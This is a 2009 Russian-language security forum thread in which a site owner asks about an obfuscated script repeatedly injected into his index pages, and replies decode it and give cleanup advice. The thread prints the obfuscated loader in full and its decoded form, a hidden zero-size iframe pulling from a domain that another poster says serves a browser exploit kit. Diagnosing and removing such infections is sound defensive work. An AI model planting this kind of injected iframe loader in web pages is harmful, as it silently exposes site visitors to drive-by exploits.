Взломан сайт. Оставлен код IFrame вируса

Discussion in 'Безопасность и Анонимность' started by megapr3v3d, 21 Apr 2009.

  1. megapr3v3d

    megapr3v3d Elder - Старейшина

    Joined:
    1 Oct 2007
    Messages:
    52
    Likes Received:
    1
    Reputations:
    0
    Взломали сайт, в индексы вставили код

    Code:
    <script>var source ="=tdsjqu?epdvnfou/xsjuf)voftdbqf)(&4d&7:&77&83&72&7e&76&31&84&83&74&4e&33&79&85&85&81&4b&3g&3g&43&7:&74&82&7e&72&78&3f&83&86&3g&86&81&75&6g&8:&76&84&3g&7:&7f&75&76&89&3f&81&79&81&33&31&88&7:&75&85&79&4e&33&41&33&31&79&76&7:&78&79&85&4e&33&41&33&31&84&85&8:&7d&76&4e&33&75&7:&84&81&7d&72&8:&4b&7f&7g&7f&76&4c&33&4f&4d&3g&7:&77&83&72&7e&76&4f(**=0tdsjqu?"; var result = "";   for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);   document.write(result); </script>
    Код удалил. На след день опять код появился. Сменил все пассы на админов и модеров. Удалил скрипт этот. Через день опять этот скрипт появился в индексах.
    Подскажите что это за скрипт, что в нем зашифровано? и как от него избавиться?
     
  2. KentPol

    KentPol Elder - Старейшина

    Joined:
    3 Jun 2008
    Messages:
    94
    Likes Received:
    17
    Reputations:
    0
    >как от него избавиться?
    проанализировать все скрипты на сервере и исправить баги.
    Неумеешь сам - нанимай профи.
     
  3. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Ищи в остальных скриптах левый код и удаляй его.
     
  4. megapr3v3d

    megapr3v3d Elder - Старейшина

    Joined:
    1 Oct 2007
    Messages:
    52
    Likes Received:
    1
    Reputations:
    0
    спасибо за советы.
    Теперь мне интересно что это за код? и как его дешифровать?
     
  5. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Код закрипртован.
     
  6. stopxaker

    stopxaker Elder - Старейшина

    Joined:
    6 Sep 2008
    Messages:
    269
    Likes Received:
    284
    Reputations:
    18

    в первую очеред смени все пассы на FTP , то что ты удаляешь этот код это все хрень , сам он туда не вставиться , верно ?! его кто то же прописывает , и вот этот кто то , имеет твой акк на твой ftp , кароче совет > с чистой машины , зайти и поменять все пароли на всех акках ! :cool:

    а уж потом чисти скрипты !
     
  7. kl0yn

    kl0yn New Member

    Joined:
    15 Dec 2008
    Messages:
    31
    Likes Received:
    3
    Reputations:
    0
    Декодированный код
    <iframe src="http://2icqmag.ru/upd_yes/index.php" width="0" height="0" style="display:none;"></iframe>=

    Это скрытый фрейм, в котором загружаеться "http://2icqmag.ru/upd_yes/index.php"
     
    #7 kl0yn, 21 Apr 2009
    Last edited: 21 Apr 2009
    1 person likes this.
  8. megapr3v3d

    megapr3v3d Elder - Старейшина

    Joined:
    1 Oct 2007
    Messages:
    52
    Likes Received:
    1
    Reputations:
    0
    Прошел по ссылке 2icqmag.ru/upd_yes/index.php

    а там след. код:
    этих два скрипта возможно декриптовать?
    (чем-то квест напоминает)
    Зашел в след раз по этой ссылке м меня перенаправило на http://defaultpage.3fn.net/?htr=sexy-zone.ru

    marketing.3fn.net/ru/ - партнерка. Так понимаю в том коде ссылка на рекламу, которую для аккаунта sexy-zone.ru предоставляет партнерка.
     
    #8 megapr3v3d, 22 Apr 2009
    Last edited: 22 Apr 2009
  9. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    твой фреем ссылается на связку сплоитов, а этот код какраз и выдает сплоит под твой браузер, кстате мне пытались pdf сплоит впарить))), если знать точные названия папок на этой ссылке то можно выжать от туда сплоиты...

    P.S.

    декодировал первую часть скрипта и вот что там было зашифровано:
    P.S.

    вторая половина скрипта закодирована:

    :) скрипт раскодирован полностью :)
     
    _________________________
    #9 winstrool, 22 Apr 2009
    Last edited: 22 Apr 2009
  10. megapr3v3d

    megapr3v3d Elder - Старейшина

    Joined:
    1 Oct 2007
    Messages:
    52
    Likes Received:
    1
    Reputations:
    0
    Забавно. Помимо того что рекламу крутить собрался на сайте, так еще и заразить компы)
     
  11. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    человек сразу дал понять о чем речь идет, и то что если ты прошелся по ссылкам то ты должен был понимать о том куда ты идешь...
     
    _________________________
  12. megapr3v3d

    megapr3v3d Elder - Старейшина

    Joined:
    1 Oct 2007
    Messages:
    52
    Likes Received:
    1
    Reputations:
    0
    Вот такой вирус оставлен в некоторых php файлах после ?>
    что он означает? помимо того, что это iframe)
     
  13. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    там закодирован фреем код
    который подключает сайт _analyse.cc в данном случае на том адресе прописан редирект на партнерку, а вообще за счет этого кода можно подключить выполнения произвольных сценариев на правленый на посетителей страници с этим кодом.
     
    _________________________
Loading...
Similar Threads - Взломан сайт Оставлен
  1. xakepok777
    Replies:
    4
    Views:
    4,233